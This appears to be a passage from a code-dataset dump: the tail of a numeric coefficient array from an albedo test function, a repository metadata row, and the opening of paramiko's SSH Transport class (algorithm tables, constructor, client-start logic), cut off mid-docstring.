-0.11538975e-03,
-0.13264996e-03,
-0.15311912e-03,
-0.17894371e-03,
-0.21519083e-03,
-0.27111307e-03,
-0.36378118e-03,
-0.52517361e-03,
-0.80816675e-03,
-0.12878858e-02,
-0.20363682e-02,
-0.30407030e-02,
-0.40585143e-02,
-0.45180605e-02,
-0.37541774e-02,
-0.16340034e-02,
0.92716783e-03,
0.24486976e-02,
0.22101640e-02,
0.82245702e-03,
-0.59355749e-03,
-0.14349412e-02,
-0.17818650e-02,
-0.19710022e-02,
-0.22550686e-02,
-0.27460111e-02,
-0.34975049e-02,
-0.45994679e-02,
-0.62465151e-02,
-0.86843111e-02,
-0.11772950e-01,
-0.14247025e-01,
-0.13897673e-01,
-0.95402114e-02,
-0.26456779e-02,
0.37637560e-02,
0.75113312e-02,
0.82785152e-02,
0.16024915e-03,
0.18166313e-03,
0.20833101e-03,
0.23556003e-03,
0.25996531e-03,
0.27946456e-03,
0.29345075e-03,
0.30254686e-03,
0.30792650e-03,
0.31066421e-03,
0.31148014e-03,
0.31080900e-03,
0.30893844e-03,
0.30608277e-03,
0.30241298e-03,
0.29805984e-03,
0.29311786e-03,
0.28767882e-03,
0.28175494e-03,
0.27529473e-03,
0.26832905e-03,
0.26097632e-03,
0.25335979e-03,
0.24527783e-03,
0.23663967e-03,
0.22766842e-03,
0.21843993e-03,
0.20887410e-03,
0.19898124e-03,
0.18877641e-03,
0.17849728e-03,
0.16801062e-03,
0.15736978e-03,
0.14671541e-03,
0.13608270e-03,
0.12537625e-03,
0.11459773e-03,
0.10394175e-03,
0.93250273e-04,
0.82784871e-04,
0.72433824e-04,
0.62449340e-04,
0.52622323e-04,
0.43097367e-04,
0.34058194e-04,
0.25217514e-04,
0.16786646e-04,
0.86424679e-05,
0.63486573e-06,
-0.73354054e-05,
-0.15307762e-04,
-0.23343211e-04,
-0.31608852e-04,
-0.40205730e-04,
-0.49073769e-04,
-0.58462469e-04,
-0.68241599e-04,
-0.78819096e-04,
-0.90594622e-04,
-0.10456181e-03,
-0.12214016e-03,
-0.14677636e-03,
-0.18476187e-03,
-0.24763195e-03,
-0.35712289e-03,
-0.54928858e-03,
-0.87579578e-03,
-0.13871513e-02,
-0.20772433e-02,
-0.27833104e-02,
-0.31113259e-02,
-0.25939168e-02,
-0.11258019e-02,
0.66039932e-03,
0.17193498e-02,
0.15396239e-02,
0.55894168e-03,
-0.42620959e-03,
-0.99759083e-03,
-0.12229718e-02,
-0.13435301e-02,
-0.15339972e-02,
-0.18679998e-02,
-0.23784370e-02,
-0.31225604e-02,
-0.42320755e-02,
-0.58987723e-02,
-0.81079528e-02,
-0.10059725e-01,
-0.10070107e-01,
-0.69461395e-02,
-0.15970924e-02,
0.35173711e-02,
0.64823525e-02,
0.69939806e-02,
0.58447313e-02,
0.99998928e-04,
0.11336149e-03,
0.13000234e-03,
0.14699313e-03,
0.16222145e-03,
0.17438777e-03,
0.18311353e-03,
0.18878833e-03,
0.19214548e-03,
0.19385564e-03,
0.19436714e-03,
0.19395056e-03,
0.19278521e-03,
0.19100346e-03,
0.18871219e-03,
0.18599514e-03,
0.18291226e-03,
0.17952279e-03,
0.17582905e-03,
0.17179834e-03,
0.16745202e-03,
0.16285951e-03,
0.15811202e-03,
0.15307403e-03,
0.14767774e-03,
0.14207418e-03,
0.13631718e-03,
0.13035099e-03,
0.12418116e-03,
0.11780974e-03,
0.11139606e-03,
0.10484913e-03,
0.98205564e-04,
0.91553651e-04,
0.84926301e-04,
0.78246710e-04,
0.71511990e-04,
0.64868305e-04,
0.58195605e-04,
0.51666491e-04,
0.45197361e-04,
0.38973347e-04,
0.32842243e-04,
0.26893933e-04,
0.21249898e-04,
0.15730866e-04,
0.10472757e-04,
0.53960257e-05,
0.39317513e-06,
-0.45791730e-05,
-0.95536843e-05,
-0.14566379e-04,
-0.19728041e-04,
-0.25091455e-04,
-0.30624815e-04,
-0.36488018e-04,
-0.42586758e-04,
-0.49185081e-04,
-0.56528501e-04,
-0.65242508e-04,
-0.76187855e-04,
-0.91523340e-04,
-0.11515653e-03,
-0.15424404e-03,
-0.22232164e-03,
-0.34186023e-03,
-0.54521387e-03,
-0.86433312e-03,
-0.12963127e-02,
-0.17405468e-02,
-0.19500151e-02,
-0.16286803e-02,
-0.70585759e-03,
0.42125979e-03,
0.10887617e-02,
0.97085984e-03,
0.34771912e-03,
-0.27306599e-03,
-0.62840234e-03,
-0.76508470e-03,
-0.83742116e-03,
-0.95511600e-03,
-0.11631359e-02,
-0.14807530e-02,
-0.19422875e-02,
-0.26292126e-02,
-0.36683388e-02,
-0.50780545e-02,
-0.63869823e-02,
-0.64897770e-02,
-0.44976156e-02,
-0.92731958e-03,
0.25404119e-02,
0.45405924e-02,
0.48503033e-02,
0.40294230e-02,
0.27683314e-02,
0.53884014e-04,
0.61084211e-04,
0.70050810e-04,
0.79205915e-04,
0.87411223e-04,
0.93966446e-04,
0.98667610e-04,
0.10172475e-03,
0.10353317e-03,
0.10445446e-03,
0.10473084e-03,
0.10450836e-03,
0.10388237e-03,
0.10292211e-03,
0.10168495e-03,
0.10021854e-03,
0.98558390e-04,
0.96735770e-04,
0.94745832e-04,
0.92573500e-04,
0.90232592e-04,
0.87755776e-04,
0.85199157e-04,
0.82488186e-04,
0.79575933e-04,
0.76551951e-04,
0.73451745e-04,
0.70241033e-04,
0.66919587e-04,
0.63485968e-04,
0.60029004e-04,
0.56497996e-04,
0.52914555e-04,
0.49328813e-04,
0.45763074e-04,
0.42167223e-04,
0.38533406e-04,
0.34952976e-04,
0.31360858e-04,
0.27841659e-04,
0.24351986e-04,
0.21002805e-04,
0.17696189e-04,
0.14492869e-04,
0.11447947e-04,
0.84757721e-05,
0.56412364e-05,
0.29090747e-05,
0.20986288e-06,
-0.24671158e-05,
-0.51494958e-05,
-0.78480261e-05,
-0.10632524e-04,
-0.13520086e-04,
-0.16503614e-04,
-0.19662311e-04,
-0.22948981e-04,
-0.26503118e-04,
-0.30458663e-04,
-0.35155379e-04,
-0.41044819e-04,
-0.49301310e-04,
-0.62018436e-04,
-0.83043000e-04,
-0.11966786e-03,
-0.18399033e-03,
-0.29346853e-03,
-0.46542627e-03,
-0.69852220e-03,
-0.93878357e-03,
-0.10528294e-02,
-0.88006578e-03,
-0.38117066e-03,
0.22924476e-03,
0.59057289e-03,
0.52561943e-03,
0.18708916e-03,
-0.14889365e-03,
-0.34005527e-03,
-0.41272707e-03,
-0.45099761e-03,
-0.51413663e-03,
-0.62613422e-03,
-0.79706579e-03,
-0.10450790e-02,
-0.14138672e-02,
-0.19733894e-02,
-0.27403242e-02,
-0.34682453e-02,
-0.35488785e-02,
-0.24659703e-02,
-0.48296375e-03,
0.14571503e-02,
0.25734871e-02,
0.27371510e-02,
0.22676513e-02,
0.15553402e-02,
0.87312493e-03,
0.21932714e-04,
0.24863417e-04,
0.28513090e-04,
0.32239484e-04,
0.35579265e-04,
0.38247381e-04,
0.40160809e-04,
0.41405037e-04,
0.42140975e-04,
0.42515869e-04,
0.42628493e-04,
0.42538381e-04,
0.42284017e-04,
0.41893109e-04,
0.41388936e-04,
0.40791474e-04,
0.40115974e-04,
0.39374940e-04,
0.38564984e-04,
0.37680649e-04,
0.36728081e-04,
0.35719502e-04,
0.34679109e-04,
0.33576438e-04,
0.32390075e-04,
0.31158215e-04,
0.29896764e-04,
0.28590852e-04,
0.27239597e-04,
0.25841982e-04,
0.24434608e-04,
0.22996630e-04,
0.21537227e-04,
0.20077452e-04,
0.18627210e-04,
0.17164399e-04,
0.15684327e-04,
0.14226660e-04,
0.12765439e-04,
0.11332698e-04,
0.99115950e-05,
0.85493384e-05,
0.72026537e-05,
0.58994046e-05,
0.46591872e-05,
0.34499117e-05,
0.22957561e-05,
0.11843766e-05,
0.84998014e-07,
-0.10040685e-05,
-0.20963864e-05,
-0.31941836e-05,
-0.43282666e-05,
-0.55030100e-05,
-0.67179099e-05,
-0.80033133e-05,
-0.93413128e-05,
-0.10787697e-04,
-0.12397514e-04,
-0.14309594e-04,
-0.16705344e-04,
-0.20065328e-04,
-0.25239178e-04,
-0.33791446e-04,
-0.48691152e-04,
-0.74860320e-04,
-0.11940804e-03,
-0.18940083e-03,
-0.28432420e-03,
-0.38224252e-03,
-0.42882701e-03,
-0.35856038e-03,
-0.15526464e-03,
0.93624702e-04,
0.24092782e-03,
0.21429047e-03,
0.76112388e-04,
-0.60849816e-04,
-0.13861567e-03,
-0.16805886e-03,
-0.18353794e-03,
-0.20919893e-03,
-0.25477342e-03,
-0.32431912e-03,
-0.42517454e-03,
-0.57509379e-03,
-0.80277218e-03,
-0.11159416e-02,
-0.14153966e-02,
-0.14518298e-02,
-0.10097986e-02,
-0.19427406e-03,
0.60561736e-03,
0.10654813e-02,
0.11315914e-02,
0.93659549e-03,
0.64201583e-03,
0.36030522e-03,
0.14866883e-03,
0.41634707e-05,
0.47198023e-05,
0.54126149e-05,
0.61199912e-05,
0.67539763e-05,
0.72604594e-05,
0.76236788e-05,
0.78598650e-05,
0.79995607e-05,
0.80707214e-05,
0.80921054e-05,
0.80750178e-05,
0.80267509e-05,
0.79525425e-05,
0.78568110e-05,
0.77433706e-05,
0.76151509e-05,
0.74745158e-05,
0.73207625e-05,
0.71528843e-05,
0.69720704e-05,
0.67805959e-05,
0.65831077e-05,
0.63738212e-05,
0.61485744e-05,
0.59146905e-05,
0.56752488e-05,
0.54273883e-05,
0.51709094e-05,
0.49056021e-05,
0.46384298e-05,
0.43654286e-05,
0.40883574e-05,
0.38112394e-05,
0.35359881e-05,
0.32583384e-05,
0.29773378e-05,
0.27006156e-05,
0.24232718e-05,
0.21512824e-05,
0.18814886e-05,
0.16229329e-05,
0.13672592e-05,
0.11198919e-05,
0.88442783e-06,
0.65489411e-06,
0.43578387e-06,
0.22484058e-06,
0.16117639e-07,
-0.19059540e-06,
-0.39797052e-06,
-0.60633920e-06,
-0.82165008e-06,
-0.10446255e-05,
-0.12752704e-05,
-0.15192638e-05,
-0.17732648e-05,
-0.20478196e-05,
-0.23534012e-05,
-0.27163851e-05,
-0.31711115e-05,
-0.38089131e-05,
-0.47909707e-05,
-0.64142382e-05,
-0.92423534e-05,
-0.14209581e-04,
-0.22665536e-04,
-0.35952206e-04,
-0.53973064e-04,
-0.72565315e-04,
-0.81414371e-04,
-0.68077694e-04,
-0.29477938e-04,
0.17784128e-04,
0.45754921e-04,
0.40691128e-04,
0.14446910e-04,
-0.11559983e-04,
-0.26320620e-04,
-0.31904819e-04,
-0.34839621e-04,
-0.39709423e-04,
-0.48360336e-04,
-0.61561077e-04,
-0.80702943e-04,
-0.10915505e-03,
-0.15237252e-03,
-0.21185735e-03,
-0.26881794e-03,
-0.27586648e-03,
-0.19191137e-03,
-0.36795147e-04,
0.11542100e-03,
0.20291690e-03,
0.21544744e-03,
0.17828873e-03,
0.12219916e-03,
0.68575428e-04,
0.28294970e-04,
0.53851386e-05,
]
)
return spherical_albedo, albedo, expected_r1
| true | true |
f72eebafad7228c74cea213d49c8f2565bcb055c | 112,270 | py | Python | AI-env/lib/python3.7/site-packages/paramiko/transport.py | parth5795/iOT-benchmarking | 6dfc95907d85f50ee2c68592ce78b4212be5f823 | [
"MIT"
] | 12 | 2018-07-18T05:45:18.000Z | 2020-02-19T21:27:33.000Z | AI-env/lib/python3.7/site-packages/paramiko/transport.py | parth5795/iOT-benchmarking | 6dfc95907d85f50ee2c68592ce78b4212be5f823 | [
"MIT"
] | 12 | 2021-03-09T03:01:16.000Z | 2022-03-11T23:59:36.000Z | AI-env/lib/python3.7/site-packages/paramiko/transport.py | parth5795/iOT-benchmarking | 6dfc95907d85f50ee2c68592ce78b4212be5f823 | [
"MIT"
] | 6 | 2019-02-20T00:42:29.000Z | 2020-08-08T17:01:43.000Z | # Copyright (C) 2003-2007 Robey Pointer <robeypointer@gmail.com>
# Copyright (C) 2003-2007 Robey Pointer <robeypointer@gmail.com>
#
# This file is part of paramiko.
#
# Paramiko is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Paramiko; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
"""
Core protocol implementation
"""
from __future__ import print_function
import os
import socket
import sys
import threading
import time
import weakref
from hashlib import md5, sha1, sha256, sha512
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers import algorithms, Cipher, modes
import paramiko
from paramiko import util
from paramiko.auth_handler import AuthHandler
from paramiko.ssh_gss import GSSAuth
from paramiko.channel import Channel
from paramiko.common import (
xffffffff,
cMSG_CHANNEL_OPEN,
cMSG_IGNORE,
cMSG_GLOBAL_REQUEST,
DEBUG,
MSG_KEXINIT,
MSG_IGNORE,
MSG_DISCONNECT,
MSG_DEBUG,
ERROR,
WARNING,
cMSG_UNIMPLEMENTED,
INFO,
cMSG_KEXINIT,
cMSG_NEWKEYS,
MSG_NEWKEYS,
cMSG_REQUEST_SUCCESS,
cMSG_REQUEST_FAILURE,
CONNECTION_FAILED_CODE,
OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED,
OPEN_SUCCEEDED,
cMSG_CHANNEL_OPEN_FAILURE,
cMSG_CHANNEL_OPEN_SUCCESS,
MSG_GLOBAL_REQUEST,
MSG_REQUEST_SUCCESS,
MSG_REQUEST_FAILURE,
MSG_CHANNEL_OPEN_SUCCESS,
MSG_CHANNEL_OPEN_FAILURE,
MSG_CHANNEL_OPEN,
MSG_CHANNEL_SUCCESS,
MSG_CHANNEL_FAILURE,
MSG_CHANNEL_DATA,
MSG_CHANNEL_EXTENDED_DATA,
MSG_CHANNEL_WINDOW_ADJUST,
MSG_CHANNEL_REQUEST,
MSG_CHANNEL_EOF,
MSG_CHANNEL_CLOSE,
MIN_WINDOW_SIZE,
MIN_PACKET_SIZE,
MAX_WINDOW_SIZE,
DEFAULT_WINDOW_SIZE,
DEFAULT_MAX_PACKET_SIZE,
HIGHEST_USERAUTH_MESSAGE_ID,
MSG_UNIMPLEMENTED,
MSG_NAMES,
)
from paramiko.compress import ZlibCompressor, ZlibDecompressor
from paramiko.dsskey import DSSKey
from paramiko.ed25519key import Ed25519Key
from paramiko.kex_gex import KexGex, KexGexSHA256
from paramiko.kex_group1 import KexGroup1
from paramiko.kex_group14 import KexGroup14
from paramiko.kex_ecdh_nist import KexNistp256, KexNistp384, KexNistp521
from paramiko.kex_gss import KexGSSGex, KexGSSGroup1, KexGSSGroup14
from paramiko.message import Message
from paramiko.packet import Packetizer, NeedRekeyException
from paramiko.primes import ModulusPack
from paramiko.py3compat import string_types, long, byte_ord, b, input, PY2
from paramiko.rsakey import RSAKey
from paramiko.ecdsakey import ECDSAKey
from paramiko.server import ServerInterface
from paramiko.sftp_client import SFTPClient
from paramiko.ssh_exception import (
SSHException,
BadAuthenticationType,
ChannelException,
ProxyCommandFailure,
)
from paramiko.util import retry_on_signal, ClosingContextManager, clamp_value
# for thread cleanup
# Registry of running transport threads (presumably appended to by
# Transport's run loop — that code is not visible in this chunk).
_active_threads = []
def _join_lingering_threads():
    # Ask each registered transport thread to shut down; wired up via
    # atexit below so lingering threads don't block interpreter exit.
    for thr in _active_threads:
        thr.stop_thread()
import atexit
atexit.register(_join_lingering_threads)
class Transport(threading.Thread, ClosingContextManager):
    """
    An SSH Transport attaches to a stream (usually a socket), negotiates an
    encrypted session, authenticates, and then creates stream tunnels, called
    `channels <.Channel>`, across the session. Multiple channels can be
    multiplexed across a single session (and often are, in the case of port
    forwardings).
    Instances of this class may be used as context managers.
    """
    # Sentinels used to select direction when keying cipher/MAC state.
    _ENCRYPT = object()
    _DECRYPT = object()
    # SSH protocol version and the software-version string for our banner.
    _PROTO_ID = "2.0"
    _CLIENT_ID = "paramiko_{}".format(paramiko.__version__)
    # These tuples of algorithm identifiers are in preference order; do not
    # reorder without reason!
    _preferred_ciphers = (
        "aes128-ctr",
        "aes192-ctr",
        "aes256-ctr",
        "aes128-cbc",
        "aes192-cbc",
        "aes256-cbc",
        "blowfish-cbc",
        "3des-cbc",
    )
    _preferred_macs = (
        "hmac-sha2-256",
        "hmac-sha2-512",
        "hmac-sha1",
        "hmac-md5",
        "hmac-sha1-96",
        "hmac-md5-96",
    )
    _preferred_keys = (
        "ssh-ed25519",
        "ecdsa-sha2-nistp256",
        "ecdsa-sha2-nistp384",
        "ecdsa-sha2-nistp521",
        "ssh-rsa",
        "ssh-dss",
    )
    _preferred_kex = (
        "ecdh-sha2-nistp256",
        "ecdh-sha2-nistp384",
        "ecdh-sha2-nistp521",
        "diffie-hellman-group-exchange-sha256",
        "diffie-hellman-group-exchange-sha1",
        "diffie-hellman-group14-sha1",
        "diffie-hellman-group1-sha1",
    )
    # GSS-API key-exchange methods; prepended to _preferred_kex in __init__
    # when gss_kex is requested.
    _preferred_gsskex = (
        "gss-gex-sha1-toWM5Slw5Ew8Mqkay+al2g==",
        "gss-group14-sha1-toWM5Slw5Ew8Mqkay+al2g==",
        "gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==",
    )
    _preferred_compression = ("none",)
    # Map of cipher name -> cryptography primitives plus block/key sizes
    # (sizes in bytes).
    _cipher_info = {
        "aes128-ctr": {
            "class": algorithms.AES,
            "mode": modes.CTR,
            "block-size": 16,
            "key-size": 16,
        },
        "aes192-ctr": {
            "class": algorithms.AES,
            "mode": modes.CTR,
            "block-size": 16,
            "key-size": 24,
        },
        "aes256-ctr": {
            "class": algorithms.AES,
            "mode": modes.CTR,
            "block-size": 16,
            "key-size": 32,
        },
        "blowfish-cbc": {
            "class": algorithms.Blowfish,
            "mode": modes.CBC,
            "block-size": 8,
            "key-size": 16,
        },
        "aes128-cbc": {
            "class": algorithms.AES,
            "mode": modes.CBC,
            "block-size": 16,
            "key-size": 16,
        },
        "aes192-cbc": {
            "class": algorithms.AES,
            "mode": modes.CBC,
            "block-size": 16,
            "key-size": 24,
        },
        "aes256-cbc": {
            "class": algorithms.AES,
            "mode": modes.CBC,
            "block-size": 16,
            "key-size": 32,
        },
        "3des-cbc": {
            "class": algorithms.TripleDES,
            "mode": modes.CBC,
            "block-size": 8,
            "key-size": 24,
        },
    }
    # Map of MAC name -> hash constructor and digest truncation size (bytes).
    _mac_info = {
        "hmac-sha1": {"class": sha1, "size": 20},
        "hmac-sha1-96": {"class": sha1, "size": 12},
        "hmac-sha2-256": {"class": sha256, "size": 32},
        "hmac-sha2-512": {"class": sha512, "size": 64},
        "hmac-md5": {"class": md5, "size": 16},
        "hmac-md5-96": {"class": md5, "size": 12},
    }
    # Map of host-key algorithm name -> key class used to parse/verify it.
    _key_info = {
        "ssh-rsa": RSAKey,
        "ssh-rsa-cert-v01@openssh.com": RSAKey,
        "ssh-dss": DSSKey,
        "ssh-dss-cert-v01@openssh.com": DSSKey,
        "ecdsa-sha2-nistp256": ECDSAKey,
        "ecdsa-sha2-nistp256-cert-v01@openssh.com": ECDSAKey,
        "ecdsa-sha2-nistp384": ECDSAKey,
        "ecdsa-sha2-nistp384-cert-v01@openssh.com": ECDSAKey,
        "ecdsa-sha2-nistp521": ECDSAKey,
        "ecdsa-sha2-nistp521-cert-v01@openssh.com": ECDSAKey,
        "ssh-ed25519": Ed25519Key,
        "ssh-ed25519-cert-v01@openssh.com": Ed25519Key,
    }
    # Map of kex algorithm name -> kex engine class.
    _kex_info = {
        "diffie-hellman-group1-sha1": KexGroup1,
        "diffie-hellman-group14-sha1": KexGroup14,
        "diffie-hellman-group-exchange-sha1": KexGex,
        "diffie-hellman-group-exchange-sha256": KexGexSHA256,
        "gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==": KexGSSGroup1,
        "gss-group14-sha1-toWM5Slw5Ew8Mqkay+al2g==": KexGSSGroup14,
        "gss-gex-sha1-toWM5Slw5Ew8Mqkay+al2g==": KexGSSGex,
        "ecdh-sha2-nistp256": KexNistp256,
        "ecdh-sha2-nistp384": KexNistp384,
        "ecdh-sha2-nistp521": KexNistp521,
    }
    _compression_info = {
        # zlib@openssh.com is just zlib, but only turned on after a successful
        # authentication. openssh servers may only offer this type because
        # they've had troubles with security holes in zlib in the past.
        "zlib@openssh.com": (ZlibCompressor, ZlibDecompressor),
        "zlib": (ZlibCompressor, ZlibDecompressor),
        "none": (None, None),
    }
    # Class-level slot for the shared group-exchange prime table; populated
    # by load_server_moduli().
    _modulus_pack = None
    # Socket timeout (seconds) so the worker thread can periodically check
    # self.active instead of blocking forever.
    _active_check_timeout = 0.1
def __init__(
self,
sock,
default_window_size=DEFAULT_WINDOW_SIZE,
default_max_packet_size=DEFAULT_MAX_PACKET_SIZE,
gss_kex=False,
gss_deleg_creds=True,
):
"""
Create a new SSH session over an existing socket, or socket-like
object. This only creates the `.Transport` object; it doesn't begin
the SSH session yet. Use `connect` or `start_client` to begin a client
session, or `start_server` to begin a server session.
If the object is not actually a socket, it must have the following
methods:
- ``send(str)``: Writes from 1 to ``len(str)`` bytes, and returns an
int representing the number of bytes written. Returns
0 or raises ``EOFError`` if the stream has been closed.
- ``recv(int)``: Reads from 1 to ``int`` bytes and returns them as a
string. Returns 0 or raises ``EOFError`` if the stream has been
closed.
- ``close()``: Closes the socket.
- ``settimeout(n)``: Sets a (float) timeout on I/O operations.
For ease of use, you may also pass in an address (as a tuple) or a host
string as the ``sock`` argument. (A host string is a hostname with an
optional port (separated by ``":"``) which will be converted into a
tuple of ``(hostname, port)``.) A socket will be connected to this
address and used for communication. Exceptions from the ``socket``
call may be thrown in this case.
.. note::
Modifying the the window and packet sizes might have adverse
effects on your channels created from this transport. The default
values are the same as in the OpenSSH code base and have been
battle tested.
:param socket sock:
a socket or socket-like object to create the session over.
:param int default_window_size:
sets the default window size on the transport. (defaults to
2097152)
:param int default_max_packet_size:
sets the default max packet size on the transport. (defaults to
32768)
.. versionchanged:: 1.15
Added the ``default_window_size`` and ``default_max_packet_size``
arguments.
"""
self.active = False
self.hostname = None
if isinstance(sock, string_types):
# convert "host:port" into (host, port)
hl = sock.split(":", 1)
self.hostname = hl[0]
if len(hl) == 1:
sock = (hl[0], 22)
else:
sock = (hl[0], int(hl[1]))
if type(sock) is tuple:
# connect to the given (host, port)
hostname, port = sock
self.hostname = hostname
reason = "No suitable address family"
addrinfos = socket.getaddrinfo(
hostname, port, socket.AF_UNSPEC, socket.SOCK_STREAM
)
for family, socktype, proto, canonname, sockaddr in addrinfos:
if socktype == socket.SOCK_STREAM:
af = family
# addr = sockaddr
sock = socket.socket(af, socket.SOCK_STREAM)
try:
retry_on_signal(lambda: sock.connect((hostname, port)))
except socket.error as e:
reason = str(e)
else:
break
else:
raise SSHException(
"Unable to connect to {}: {}".format(hostname, reason)
)
# okay, normal socket-ish flow here...
threading.Thread.__init__(self)
self.setDaemon(True)
self.sock = sock
# we set the timeout so we can check self.active periodically to
# see if we should bail. socket.timeout exception is never propagated.
self.sock.settimeout(self._active_check_timeout)
# negotiated crypto parameters
self.packetizer = Packetizer(sock)
self.local_version = "SSH-" + self._PROTO_ID + "-" + self._CLIENT_ID
self.remote_version = ""
self.local_cipher = self.remote_cipher = ""
self.local_kex_init = self.remote_kex_init = None
self.local_mac = self.remote_mac = None
self.local_compression = self.remote_compression = None
self.session_id = None
self.host_key_type = None
self.host_key = None
# GSS-API / SSPI Key Exchange
self.use_gss_kex = gss_kex
# This will be set to True if GSS-API Key Exchange was performed
self.gss_kex_used = False
self.kexgss_ctxt = None
self.gss_host = None
if self.use_gss_kex:
self.kexgss_ctxt = GSSAuth("gssapi-keyex", gss_deleg_creds)
self._preferred_kex = self._preferred_gsskex + self._preferred_kex
# state used during negotiation
self.kex_engine = None
self.H = None
self.K = None
self.initial_kex_done = False
self.in_kex = False
self.authenticated = False
self._expected_packet = tuple()
# synchronization (always higher level than write_lock)
self.lock = threading.Lock()
# tracking open channels
self._channels = ChannelMap()
self.channel_events = {} # (id -> Event)
self.channels_seen = {} # (id -> True)
self._channel_counter = 0
self.default_max_packet_size = default_max_packet_size
self.default_window_size = default_window_size
self._forward_agent_handler = None
self._x11_handler = None
self._tcp_handler = None
self.saved_exception = None
self.clear_to_send = threading.Event()
self.clear_to_send_lock = threading.Lock()
self.clear_to_send_timeout = 30.0
self.log_name = "paramiko.transport"
self.logger = util.get_logger(self.log_name)
self.packetizer.set_log(self.logger)
self.auth_handler = None
# response Message from an arbitrary global request
self.global_response = None
# user-defined event callbacks
self.completion_event = None
# how long (seconds) to wait for the SSH banner
self.banner_timeout = 15
# how long (seconds) to wait for the handshake to finish after SSH
# banner sent.
self.handshake_timeout = 15
# how long (seconds) to wait for the auth response.
self.auth_timeout = 30
# server mode:
self.server_mode = False
self.server_object = None
self.server_key_dict = {}
self.server_accepts = []
self.server_accept_cv = threading.Condition(self.lock)
self.subsystem_table = {}
def __repr__(self):
"""
Returns a string representation of this object, for debugging.
"""
id_ = hex(long(id(self)) & xffffffff)
out = "<paramiko.Transport at {}".format(id_)
if not self.active:
out += " (unconnected)"
else:
if self.local_cipher != "":
out += " (cipher {}, {:d} bits)".format(
self.local_cipher,
self._cipher_info[self.local_cipher]["key-size"] * 8,
)
if self.is_authenticated():
out += " (active; {} open channel(s))".format(
len(self._channels)
)
elif self.initial_kex_done:
out += " (connected; awaiting auth)"
else:
out += " (connecting)"
out += ">"
return out
def atfork(self):
"""
Terminate this Transport without closing the session. On posix
systems, if a Transport is open during process forking, both parent
and child will share the underlying socket, but only one process can
use the connection (without corrupting the session). Use this method
to clean up a Transport object without disrupting the other process.
.. versionadded:: 1.5.3
"""
self.sock.close()
self.close()
def get_security_options(self):
"""
Return a `.SecurityOptions` object which can be used to tweak the
encryption algorithms this transport will permit (for encryption,
digest/hash operations, public keys, and key exchanges) and the order
of preference for them.
"""
return SecurityOptions(self)
def set_gss_host(self, gss_host, trust_dns=True, gssapi_requested=True):
"""
Normalize/canonicalize ``self.gss_host`` depending on various factors.
:param str gss_host:
The explicitly requested GSS-oriented hostname to connect to (i.e.
what the host's name is in the Kerberos database.) Defaults to
``self.hostname`` (which will be the 'real' target hostname and/or
host portion of given socket object.)
:param bool trust_dns:
Indicates whether or not DNS is trusted; if true, DNS will be used
to canonicalize the GSS hostname (which again will either be
``gss_host`` or the transport's default hostname.)
(Defaults to True due to backwards compatibility.)
:param bool gssapi_requested:
Whether GSSAPI key exchange or authentication was even requested.
If not, this is a no-op and nothing happens
(and ``self.gss_host`` is not set.)
(Defaults to True due to backwards compatibility.)
:returns: ``None``.
"""
# No GSSAPI in play == nothing to do
if not gssapi_requested:
return
# Obtain the correct host first - did user request a GSS-specific name
# to use that is distinct from the actual SSH target hostname?
if gss_host is None:
gss_host = self.hostname
# Finally, canonicalize via DNS if DNS is trusted.
if trust_dns and gss_host is not None:
gss_host = socket.getfqdn(gss_host)
# And set attribute for reference later.
self.gss_host = gss_host
    def start_client(self, event=None, timeout=None):
        """
        Negotiate a new SSH2 session as a client. This is the first step after
        creating a new `.Transport`. A separate thread is created for protocol
        negotiation.

        If an event is passed in, this method returns immediately. When
        negotiation is done (successful or not), the given ``Event`` will
        be triggered. On failure, `is_active` will return ``False``.

        (Since 1.4) If ``event`` is ``None``, this method will not return until
        negotiation is done. On success, the method returns normally.
        Otherwise an SSHException is raised.

        After a successful negotiation, you will usually want to authenticate,
        calling `auth_password <Transport.auth_password>` or
        `auth_publickey <Transport.auth_publickey>`.

        .. note:: `connect` is a simpler method for connecting as a client.

        .. note::
            After calling this method (or `start_server` or `connect`), you
            should no longer directly read from or write to the original socket
            object.

        :param .threading.Event event:
            an event to trigger when negotiation is complete (optional)
        :param float timeout:
            a timeout, in seconds, for SSH2 session negotiation (optional)
        :raises:
            `.SSHException` -- if negotiation fails (and no ``event`` was
            passed in)
        """
        self.active = True
        if event is not None:
            # async, return immediately and let the app poll for completion
            self.completion_event = event
            self.start()
            return
        # synchronous, wait for a result
        self.completion_event = event = threading.Event()
        self.start()
        # Absolute deadline; None means wait forever.
        max_time = time.time() + timeout if timeout is not None else None
        while True:
            event.wait(0.1)
            if not self.active:
                e = self.get_exception()
                if e is not None:
                    raise e
                raise SSHException("Negotiation failed.")
            # NOTE(review): on deadline expiry this loop simply breaks without
            # raising; callers observe the timeout via is_active()/state.
            if event.is_set() or (
                timeout is not None and time.time() >= max_time
            ):
                break
    def start_server(self, event=None, server=None):
        """
        Negotiate a new SSH2 session as a server. This is the first step after
        creating a new `.Transport` and setting up your server host key(s). A
        separate thread is created for protocol negotiation.

        If an event is passed in, this method returns immediately. When
        negotiation is done (successful or not), the given ``Event`` will
        be triggered. On failure, `is_active` will return ``False``.

        (Since 1.4) If ``event`` is ``None``, this method will not return until
        negotiation is done. On success, the method returns normally.
        Otherwise an SSHException is raised.

        After a successful negotiation, the client will need to authenticate.
        Override the methods `get_allowed_auths
        <.ServerInterface.get_allowed_auths>`, `check_auth_none
        <.ServerInterface.check_auth_none>`, `check_auth_password
        <.ServerInterface.check_auth_password>`, and `check_auth_publickey
        <.ServerInterface.check_auth_publickey>` in the given ``server`` object
        to control the authentication process.

        After a successful authentication, the client should request to open a
        channel. Override `check_channel_request
        <.ServerInterface.check_channel_request>` in the given ``server``
        object to allow channels to be opened.

        .. note::
            After calling this method (or `start_client` or `connect`), you
            should no longer directly read from or write to the original socket
            object.

        :param .threading.Event event:
            an event to trigger when negotiation is complete.
        :param .ServerInterface server:
            an object used to perform authentication and create `channels
            <.Channel>`
        :raises:
